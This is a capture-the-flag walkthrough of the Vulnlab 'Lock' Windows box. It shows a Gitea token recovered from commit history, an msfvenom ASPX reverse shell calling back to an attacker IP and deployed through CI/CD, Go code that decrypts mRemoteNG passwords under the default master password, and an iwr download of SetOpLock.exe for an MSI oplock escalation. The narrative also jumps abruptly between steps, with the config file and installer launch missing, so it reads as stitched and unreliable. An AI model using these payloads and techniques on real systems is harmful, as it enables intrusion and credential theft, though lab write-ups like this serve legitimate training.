Lock is an easy Windows box from Vulnlab created by xct and kozmer. It involves gaining a foothold by abusing the CI/CD integration of a Gitea repository to deploy a web shell, decrypting an mRemoteNG configuration file to recover another user's password, and gaining SYSTEM-level access by exploiting the PDF24 Creator MSI installer.
NMAP
As always, we start with a standard nmap scan:
PORT     STATE SERVICE
80/tcp   open  http
445/tcp  open  microsoft-ds
3000/tcp open  ppp
3389/tcp open  ms-wbt-server
5357/tcp open  wsdapi

➜ lock sudo nmap -sCV -p80,445,3000,3389,5357 --min-rate=5000 10.10.78.126 | tee nmap.txt
[sudo] password for serioton:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-19 08:18 EST
Nmap scan report for lock.vl (10.10.78.126)
Host is up (0.049s latency).

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Lock - Index
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds?
3000/tcp open  ppp?
| fingerprint-strings:
|   GenericLines, Help, RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     .... HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Fri, 19 Jan 2024 13:18:29 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-auto">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Gitea: Git with a cup of tea</title>
|     ....
|   HTTPOptions:
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=8754cc9f87bf5b93; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=JMeupsqJURAdLO4SvVNoOVySlMM6MTcwNTY3MDMxNTA1NTIzMjMwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Fri, 19 Jan 2024 13:18:35 GMT
|_    Content-Length: 0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: LOCK
|   NetBIOS_Domain_Name: LOCK
|   NetBIOS_Computer_Name: LOCK
|   DNS_Domain_Name: Lock
|   DNS_Computer_Name: Lock
|   Product_Version: 10.0.20348
|_  System_Time: 2024-01-19T13:19:53+00:00
| ssl-cert: Subject: commonName=Lock
| Not valid before: 2023-12-27T14:19:36
|_Not valid after:  2024-06-27T14:19:36
|_ssl-date: 2024-01-19T13:20:32+00:00; -2s from scanner time.
5357/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
...
From the scan we can see five open ports: IIS on 80, SMB on 445, Gitea on 3000 (nmap labels the service ppp, but the fingerprinted banner is the Gitea login page), RDP on 3389 and WSDAPI on 5357. The rdp-ntlm-info output also tells us the host is called Lock and is standalone rather than domain-joined, since the NetBIOS domain name is just the computer name.
WEB
We start with the website on port 80, but there is nothing interesting there so far.
GITEA
Gitea is running on port 3000, so let's go there. The dev-scripts repository of the user ellen.freeman contains an interesting script, http://lock.vl:3000/ellen.freeman/dev-scripts/src/branch/main/repos.py, which looks like it authenticates to the Gitea API with a personal access token. The value is not in the current version of the file, but Git keeps every version ever committed: if we go to the commit list, the token is sitting in plain text in the initial commit:
...
# store this in env instead at some point
PERSONAL_ACCESS_TOKEN = '<REDACTED>'
...
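Why this works is worth spelling out: deleting a secret from a file in a later commit does not delete it from the repository, because Git keeps every version ever committed, and Gitea renders that history to anyone who can read the repo. The scanner below is an added example in Go, not code from the page or from the dev-scripts repository: it walks a constructed `git log -p` transcript modelled on the repos.py history, flags added lines that look like credentials, and reports whether a later commit deleted them from HEAD, which is exactly the case a scan of the current tree misses. The commit hashes, commit messages and the token value in the sample are made up.

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"strings"
)

// sampleLog is a constructed `git log -p` transcript (newest commit first, trimmed to the
// lines the scanner cares about) shaped like the dev-scripts history: a token committed
// in the initial commit, then "removed" later. Hashes and the 40-hex token are made up.
const sampleLog = `commit 7f3c2a9e0b1d4c5f6a7b8c9d0e1f2a3b4c5d6e7f

    move token to environment

diff --git a/repos.py b/repos.py
--- a/repos.py
+++ b/repos.py
@@ -1,5 +1,5 @@
+import os
 import requests
 
-# store this in env instead at some point
-PERSONAL_ACCESS_TOKEN = '43ce0f1b6d8e2a7c9b5f0e1d2c3b4a5968778695'
+PERSONAL_ACCESS_TOKEN = os.environ['GITEA_TOKEN']
 GITEA_URL = 'http://lock.vl:3000'

commit 2b6e1d0c9f8a7b6c5d4e3f2a1b0c9d8e7f6a5b4c

    initial commit

diff --git a/repos.py b/repos.py
--- /dev/null
+++ b/repos.py
@@ -0,0 +1,5 @@
+import requests
+
+# store this in env instead at some point
+PERSONAL_ACCESS_TOKEN = '43ce0f1b6d8e2a7c9b5f0e1d2c3b4a5968778695'
+GITEA_URL = 'http://lock.vl:3000'
`

type Finding struct {
	Commit, File, Secret string
	Removed              bool // a later '-' line deleted this exact value, so HEAD looks clean
}

// Either a secret-ish assignment with a long quoted literal, or a bare 40-hex string
// (Gitea personal access tokens have that shape). Exactly one capture group is set per match.
var secretRE = regexp.MustCompile(`(?i)(?:token|secret|password|passwd|api[_-]?key)\s*[:=]\s*['"]([^'"]{16,})['"]|\b([0-9a-f]{40})\b`)

func secretsIn(text string) (out []string) {
	for _, m := range secretRE.FindAllStringSubmatch(text, -1) {
		out = append(out, m[1]+m[2])
	}
	return out
}

// ScanGitLog walks `git log -p` output: added lines are scanned and attributed to their
// commit and file, removed lines are remembered so each finding can say whether the value
// was later deleted. "--- a/..." headers fall into the '-' branch harmlessly (no match).
func ScanGitLog(text string) []Finding {
	var findings []Finding
	removed := map[string]bool{}
	commit, file := "", ""
	sc := bufio.NewScanner(strings.NewReader(text))
	for sc.Scan() {
		line := sc.Text()
		switch {
		case strings.HasPrefix(line, "commit "):
			commit = strings.TrimPrefix(line, "commit ")
		case strings.HasPrefix(line, "+++ "):
			file = strings.TrimPrefix(strings.TrimPrefix(line, "+++ "), "b/")
		case strings.HasPrefix(line, "+"):
			for _, s := range secretsIn(line[1:]) {
				findings = append(findings, Finding{Commit: commit, File: file, Secret: s})
			}
		case strings.HasPrefix(line, "-"):
			for _, s := range secretsIn(line[1:]) {
				removed[s] = true
			}
		}
	}
	for i := range findings {
		findings[i].Removed = removed[findings[i].Secret]
	}
	return findings
}

func main() {
	for _, f := range ScanGitLog(sampleLog) {
		state := "still present in HEAD"
		if f.Removed {
			state = "deleted in a later commit, but recoverable from history"
		}
		fmt.Printf("%.12s %s: %s... (%s)\n", f.Commit, f.File, f.Secret[:6], state)
	}
}
```

On a real repository, feed it `git log -p --all` so deleted branches and tags are covered too. A finding marked as deleted is the one to act on first: the fix is to revoke the token, since rewriting history does nothing for a value that has already been cloned.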
Great, now we have a valid access token. What can we do with it? We can place it in the script we just pulled and run it against the Gitea instance, which leads us to a repository called website. We clone it and take a look:
➜ lock cd website
➜ website git:(main) ls
assets  changelog.txt  index.html  readme.md
This looks like the site that is running on port 80. The readme.md file mentions something interesting:
➜ website git:(main) cat readme.md
# New Project Website

CI/CD integration is now active - changes to the repository will automatically be deployed to the webserver
Shell as ellen.freeman
The README tells us that any change pushed to the repository, such as adding or modifying a file, is deployed automatically to the web server. In other words, write access to this repository is code execution on the IIS host, and the token we recovered gives us that write access. The plan is to commit an ASPX reverse shell, let the pipeline deploy it, and then trigger it by requesting http://lock.vl/exploit.aspx. First we generate the ASPX payload with msfvenom:
➜ website git:(main) msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.0.210 LPORT=443 -f aspx -o exploit.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3402 bytes
Saved as: exploit.aspx
After that, we add exploit.aspx to the repository, commit, and push using the access token for authentication. Once the pipeline has deployed it, a request to http://lock.vl/exploit.aspx runs the payload and our listener catches the connection:
➜ lock rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.0.210] from (UNKNOWN) [10.10.78.126] 50949
Microsoft Windows [Version 10.0.20348.2159]
(c) Microsoft Corporation. All rights reserved.
This is an mRemoteNG configuration file belonging to the gale.dekarios user. The stored password is encrypted, but mRemoteNG derives the encryption key from a master password that, unless the user sets one, is a fixed built-in default, so anyone holding the file can decrypt it offline. A quick search for "mremoteng password decrypt" leads to https://github.com/gquere/mRemoteNG_password_decrypt, a tool that does exactly that for mRemoteNG configuration files. Running it against the file gives us the decrypted password.
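Why the tool needs no password from us deserves a closer look. In mRemoteNG versions of this generation (1.76 is what sits in _install), each Node's Password attribute in confCons.xml is base64(salt[16] || nonce[16] || ciphertext || GCM tag[16]): AES-256-GCM with the salt as associated data, under a key derived by PBKDF2-HMAC-SHA1 (the KdfIterations attribute, 1000 by default) from a master password that, unless the user set one, is the fixed built-in string mR3m. That is the layout the linked tool implements; the Go below is an added example of the same scheme written for this page, not the tool's code or anything from the original post. Because no real confCons.xml can be included here, it also carries an Encrypt helper of its own so it can construct a sample blob at run time; the sample password is made up.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha1"
	"encoding/base64"
	"encoding/binary"
	"fmt"
)

// Layout of a Password attribute, as the linked decrypt tool implements it:
//   base64( salt[16] || nonce[16] || ciphertext || GCM tag[16] )
// key = PBKDF2-HMAC-SHA1(master, salt, KdfIterations, 32 bytes); the salt is also the
// GCM associated data, so a tampered header fails authentication too.
const (
	saltLen, nonceLen, tagLen, keyLen = 16, 16, 16, 32
	DefaultMaster                     = "mR3m" // built-in master password when the user never set one
	DefaultIterations                 = 1000   // the KdfIterations attribute on <Connections>
)

// pbkdf2SHA1 is RFC 8018 PBKDF2 with HMAC-SHA1, hand-rolled to keep the example stdlib-only.
func pbkdf2SHA1(password, salt []byte, iter, dkLen int) []byte {
	prf := hmac.New(sha1.New, password)
	out, ctr := []byte{}, make([]byte, 4)
	for blk := uint32(1); len(out) < dkLen; blk++ {
		binary.BigEndian.PutUint32(ctr, blk)
		prf.Reset()
		prf.Write(salt)
		prf.Write(ctr)
		u := prf.Sum(nil)              // U1 = PRF(P, S || INT(blk))
		t := append([]byte(nil), u...) // T  = U1 xor U2 xor ... xor U_iter
		for i := 1; i < iter; i++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:dkLen]
}

func aead(master string, salt []byte, iter int) (cipher.AEAD, error) {
	block, err := aes.NewCipher(pbkdf2SHA1([]byte(master), salt, iter, keyLen))
	if err != nil {
		return nil, err
	}
	return cipher.NewGCMWithNonceSize(block, nonceLen) // 16-byte nonce, not GCM's usual 12
}

// Decrypt reverses one Password attribute. A wrong master password surfaces as a GCM
// authentication failure, never as plausible-looking garbage.
func Decrypt(b64, master string, iter int) (string, error) {
	blob, err := base64.StdEncoding.DecodeString(b64)
	if err != nil || len(blob) < saltLen+nonceLen+tagLen {
		return "", fmt.Errorf("malformed blob (%d bytes): %v", len(blob), err)
	}
	salt, nonce, ct := blob[:saltLen], blob[saltLen:saltLen+nonceLen], blob[saltLen+nonceLen:]
	gcm, err := aead(master, salt, iter)
	if err != nil {
		return "", err
	}
	pt, err := gcm.Open(nil, nonce, ct, salt) // Go expects ciphertext||tag, which is how the blob ends
	if err != nil {
		return "", fmt.Errorf("GCM open failed (wrong master password or tampered blob): %w", err)
	}
	return string(pt), nil
}

// Encrypt produces a blob in the same layout. It is this example's own helper for making
// test data offline, not code from the page or the decrypt tool.
func Encrypt(plaintext, master string, iter int) (string, error) {
	blob := make([]byte, saltLen+nonceLen) // random salt || random nonce
	if _, err := rand.Read(blob); err != nil {
		return "", err
	}
	gcm, err := aead(master, blob[:saltLen], iter)
	if err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(gcm.Seal(blob, blob[saltLen:], []byte(plaintext), blob[:saltLen])), nil
}

func main() {
	// Constructed sample: the kind of value you would copy out of Password="..." in confCons.xml.
	enc, err := Encrypt("constructed-sample-password", DefaultMaster, DefaultIterations)
	if err != nil {
		panic(err)
	}
	pw, err := Decrypt(enc, DefaultMaster, DefaultIterations)
	fmt.Printf("blob=%s\nrecovered=%q err=%v\n", enc, pw, err)
	_, err = Decrypt(enc, "not-the-master-password", DefaultIterations)
	fmt.Println("wrong master password ->", err)
}
```

A wrong master password fails the GCM tag check instead of producing plausible garbage, which is what makes a custom master password cleanly brute-forceable, but with the default in place there is nothing to guess at all. The defensive takeaway is to set a real master password in mRemoteNG, or better, not to leave other users' RDP credentials in a config file on disk.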
C:\>cmd /c dir /A
 Volume in drive C has no label.
 Volume Serial Number is A03D-9CEF

 Directory of C:\

12/28/2023  06:17 AM    <DIR>          $Recycle.Bin
12/27/2023  12:38 PM    <DIR>          $WinREAgent
01/19/2024  04:56 AM    <DIR>          Config.Msi
12/27/2023  06:14 PM    <JUNCTION>     Documents and Settings [C:\Users]
01/19/2024  04:36 AM            12,288 DumpStack.log.tmp
12/27/2023  11:11 AM    <DIR>          Gitea
12/27/2023  10:27 AM    <DIR>          inetpub
01/19/2024  05:47 AM    <DIR>          Microsoft
01/19/2024  04:36 AM     1,207,959,552 pagefile.sys
05/08/2021  12:20 AM    <DIR>          PerfLogs
12/28/2023  11:28 AM    <DIR>          Program Files
12/28/2023  11:24 AM    <DIR>          Program Files (x86)
12/28/2023  11:24 AM    <DIR>          ProgramData
12/27/2023  06:14 PM    <DIR>          Recovery
12/27/2023  06:14 PM    <DIR>          System Volume Information
01/19/2024  04:39 AM    <DIR>          temp
12/28/2023  06:14 AM    <DIR>          Users
12/28/2023  11:18 AM    <DIR>          Windows
12/28/2023  11:23 AM    <DIR>          _install
               2 File(s)  1,207,971,840 bytes
              17 Dir(s)   5,546,426,368 bytes free
The _install directory contains some software installers:
C:\>cd _install

C:\_install>dir
 Volume in drive C has no label.
 Volume Serial Number is A03D-9CEF

 Directory of C:\_install

12/28/2023  11:21 AM        60,804,608 Firefox Setup 121.0.msi
12/28/2023  05:39 AM        43,593,728 mRemoteNG-Installer-1.76.20.24615.msi
12/14/2023  10:07 AM       462,602,240 pdf24-creator-11.15.1-x64.msi
               3 File(s)    567,000,576 bytes
               0 Dir(s)   5,546,401,792 bytes free
The installer should start. Now we need to place an oplock on the faxPrnInst.log file as soon as the installer opens it: an opportunistic lock makes the SYSTEM-level installer process block on that file until we release the lock, which gives us the window we need. We can do that with the SetOpLock.exe tool from https://github.com/googleprojectzero/symboliclink-testing-tools. First, let's transfer it to the victim machine:
PS C:\temp> iwr http://10.8.0.210/SetOpLock.exe -outfile SetOpLock.exe
PS C:\temp> ls

    Directory: C:\temp

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/19/2024   6:06 AM         116224 SetOpLock.exe